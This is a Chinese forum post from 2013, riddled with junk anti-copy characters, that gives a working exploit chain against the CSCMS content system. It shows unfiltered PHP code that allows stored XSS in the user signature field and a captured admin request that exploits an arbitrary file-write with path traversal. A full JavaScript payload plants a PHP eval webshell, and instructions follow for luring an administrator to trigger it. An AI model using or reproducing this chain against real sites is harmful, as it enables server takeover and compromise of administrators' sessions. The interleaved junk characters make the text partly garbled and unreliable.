|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题3 N" ~/ y" \; Q w9 I! d4 P
官网已经修补了,所以重新下了源码
$ X# U7 A0 Z* B. D2 V因为 后台登入 还需要认证码 所以 注入就没看了。! u: N+ l4 [, N5 P9 Q7 G
存在 xss2 T0 D' q3 {7 W. _, g0 [
漏洞文件 user/member/skin_edit.php
+ X% ?, E6 N: \- J& Y5 Q) ]* s本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:1 H6 S- H7 s; c: t; \8 _
[- }& R, [% x9 [- |# X/ F& F# I</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>! p& j s; D, G0 R
- ~, F% ?* ~/ U
</textarea></td></tr>: c s# }$ p, s9 }6 d/ E+ P, m
1 I! y" w5 W. K3 h& Y user/do.php 8 | [2 E; w$ n& w
% Z. K( K; t8 F6 |
/ u! L* c$ N- S. E% b% f4 g
if($op=='zl'){ //资料
( B# l* D4 l" k% a. v( l* {. g( q 4 o& s% r: L! {$ x4 V1 L
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
I$ o7 ]5 w% [/ r exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));# S& [. ^% Y+ x! _3 P
F5 t4 O6 ~$ _8 J8 |, g% y/ \
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
6 _* N, B9 j4 t* C$ P: @4 m. @ # t; o& a! Y4 [
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'- H, S- p7 F$ ]& k
where CS_Name='".$cscms_name."'";
4 g5 d$ I3 z D: G9 q. Q/ Y & S5 L9 `) l4 v+ _" A3 |3 K
if($db->query($sql)){
5 M2 B1 d5 ~* |/ a+ { : @. \5 ~) Z. d$ Z5 E
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
% n0 Q: C" L; N: T; [3 D% o
1 ]2 | |: Z! a3 b g }else{
* \: r* H3 V) w1 i3 e4 B6 D 6 L* p. ]# p% W6 a4 {
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
0 y6 w+ n [3 W% B' g 4 W1 ]- d1 p7 W4 i
}/ g+ w, ^: F7 q8 K3 X- a) I# G
5 Z# Z! H7 d2 i; e3 j
( e1 {6 ~+ w! R+ s i3 ]没有 过滤导致xss产生。! a. f' ?, ^% Y5 S' t8 M: J
后台 看了下 很奇葩的是可以写任意格式文件。。
: ^# `5 j" M& D' n( K% y) \抓包。。
* u, \, i4 y' ^5 _! I: ]8 ~" ]) W/ z. ^8 P1 N
6 d* Z9 N' }% K; e本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.14 E1 ~; w( a+ f( ~
# ~8 `, ]2 s$ V8 X: o' l1 t& X" PAccept: text/html, application/xhtml+xml, */*4 `0 L3 f# U' l, W6 \
" q/ G& R7 Y, Y& `' pReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php7 l+ Y4 s! H5 O' Y2 ?
/ u' E9 p$ `5 W1 A
Accept-Language: zh-CN
. d# c& ^$ \8 j g0 e: q' q6 o 1 e! m/ W, q! D, {3 A8 Y
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
" B% P( n- Q @" n
' i/ F) f3 M4 s: p- G S" J6 iContent-Type: application/x-www-form-urlencoded3 q u4 G, W& h; ^6 O
% [5 ~' _) B1 j% d- F" m/ o4 eAccept-Encoding: gzip, deflate8 D$ R: o8 d" ^- t+ m2 }1 w- T. N
0 k4 F) g# `) |; I) @% Q% \
Host: 127.0.0.10 d$ @' y' s& A# e8 g. k, z, K3 x# M
# C) D+ g$ R7 z
Content-Length: 38
% U) U ^+ m. a: z; m7 F4 O9 Q+ L; K 6 S" J# a8 C/ m H7 b4 [: t. C5 a
DNT: 17 m/ f$ {' Q0 }5 D% a" W$ E
z9 d6 @$ N8 l' r( I O
Connection: Keep-Alive" y6 h( a b- b
! a: w) g3 _% P$ ^4 }, s
Cache-Control: no-cache
+ f+ ]# r, L" g$ q2 h$ Z
3 A. \! n/ u: o9 W. YCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
, c! x9 [, ]% D- V3 L( g; `4 J& G
. O1 b3 ~' T" E, F# o0 S1 k
7 {- e3 ]! g7 l6 R4 Oname=aaa.php&content=%3Cs%3E%3Ca%25%3E
1 H5 j; v m* m3 Y& r% K J( Q4 ^- E8 f& G! r/ i5 E) \2 I9 U* k
' }9 \0 Y: T+ V3 T3 |
3 p1 W; t: @- A5 ?& n+ \& Q* ?: N
于是 构造js如下。
* E3 @) ^( s) e, ^, J
+ U6 F4 _! \& O( {) _% `本帖隐藏的内容<script> 4 E. q! q# |+ q5 k6 M- w
thisTHost = top.location.hostname;2 K% k0 w$ v. o0 S# z8 `/ ~8 v
/ W7 x0 o d) l
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
' ?2 p2 I+ s* Q% @6 H5 x
- Q- W9 M4 @8 g4 C/ {! Kfunction PostSubmit(url, data, msg) { : e0 Q+ f4 A, s: J; H
var postUrl = url;& P& x0 d# y, {1 r
/ t/ T3 k, g/ n) m9 c
var postData = data;
t. ?" B4 U6 p var msgData = msg; ( j, g0 N: h& X6 q$ @/ X# A" B8 v
var ExportForm = document.createElement("FORM"); + g1 G p K& i7 d2 E* X- L; Y
document.body.appendChild(ExportForm);
, f+ r2 `* b' C: h ExportForm.method = "POST"; ) v* @( i- o s$ |+ k
var newElement = document.createElement("input");
3 L- {. ^5 C" n' q! P0 a) q: q) o newElement.setAttribute("name", "name"); U! C; m6 C1 ~6 U3 G/ i: W* H: h
newElement.setAttribute("type", "hidden"); 4 E+ n: l8 T* H- o3 {
var newElement2 = document.createElement("input"); ) Y( B0 X# [% S( _) W+ F2 D
newElement2.setAttribute("name", "content"); $ a' p3 {9 X+ e
newElement2.setAttribute("type", "hidden");
6 z3 K6 B8 J% T ExportForm.appendChild(newElement); , u) e4 C5 i: p& ^
ExportForm.appendChild(newElement2);
4 c! e2 s) c; k C; R3 k newElement.value = postData;
* @9 Z$ `+ A8 _- g newElement2.value = msgData;
" F8 }% J0 q, r. s. m ExportForm.action = postUrl;
' b" E* M. ]$ f ExportForm.submit(); ) U1 @4 R0 {" E
};
, r9 O5 J$ c+ _, d0 L, I! G + V6 n8 F/ S. ?; Y( Y: j
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
- x! E* {1 [1 c! y8 H" y9 P) c2 h
! E( {# O! U* M8 g% @( `! r</script>
, p6 w- q/ o4 X+ N: N4 p& o" t3 J4 c+ K2 k' A9 ]: p
* m: ^3 i: t& }9 T3 _
( i5 i8 x( h. }& l
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
! b+ s4 \" z. E用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)
) {0 ~+ V; g2 H1 _就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
' M5 P! R5 s+ U$ }! |8 c! a
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对